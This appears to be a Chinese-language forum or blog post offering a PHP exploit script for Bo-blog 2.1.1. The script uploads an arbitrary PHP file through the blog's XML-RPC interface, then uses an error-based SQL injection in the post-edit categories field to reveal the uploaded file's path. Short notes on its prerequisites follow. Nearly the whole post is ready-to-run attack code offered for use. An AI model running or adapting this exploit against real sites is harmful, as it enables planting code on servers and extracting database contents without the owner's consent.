Bo-blog 2.1.1 上传利用工具
利用代码如下:
<?php
/* thx Mr_xhming */
$host=”localhost”;
$path=’bo-blog’;
$user=’admin’; // usergroup >= 2
$pass=’admin’;
$code=’<?phpinfo()?>’;
/* 以下无需你管,填好上面参数的即可 */
$cmd=’<?xml version=”1.0″ encoding=”ISO-8859-1″?><methodName>metaWeblog.newMediaObject</methodName>
<value><int>0</int></value><value><string>’.$user.’</string></value><value><string>’.$pass.’</string
></value><value><struct><name>name</name><struct-value><struct-string>wolvez.php</struct-string>
</struct-value><name>bits</name><struct-value><struct-base64>’.base64_encode($code).’</struct-base64>
</struct-value></struct></value>’;
$html = send($cmd);echo “ok\n”;
$att=’<?xml version=”1.0″ encoding=”ISO-8859-1″?><methodName>metaWeblog.editPost</methodName><value>
<int>0</int></value><value><string>admin</string></value><value><string>admin</string></value><value><struct>
<name>title</name><struct-value><struct-string>wolvez</struct-string></struct-value><name>pubDate</name><struct-value>
<struct-string>asd</struct-string></struct-value><name>description</name><struct-value>
<struct-string>asd</struct-string></struct-value><name>categories</name><struct-value>
<struct-string>x\’ or ExtractValue(1,CONCAT(0x5c,(SELECT filepath FROM boblog_upload where originalname=0x776F6C76657A2E706870 limit 1)))#</struct-string></struct-value></struct></value>’;
$html = preg_replace(‘/(.*)XPATH syntax error: \’(.+?)\’(.*)/s’,'$2′,send($att));
exit(“{$html}php\n”);
function send($cmd){
global $host,$path;
$message = “POST /{$path}/xmlrpc.php HTTP/1.1\r\n”;
$message .= “Accept: */*\r\n”;
$message .= “Referer: “.$host.”\r\n”;
$message .= “Content-Type: text/k4shifz\r\n”;
$message .= “User-Agent: Mozilla/4.0 IE\r\n”;
$message .= “Host: “.$host.”\r\n”;
$message .= “Content-Length: “.strlen($cmd).”\r\n”;
$message .= “Connection: Close\r\n\r\n”;
$message .= $cmd;
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = ”;
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
需要管理员权限。
上传是一定能传上去的,后边那个注射就不一定出结果了,需要mysql>5.1
BY:狼族
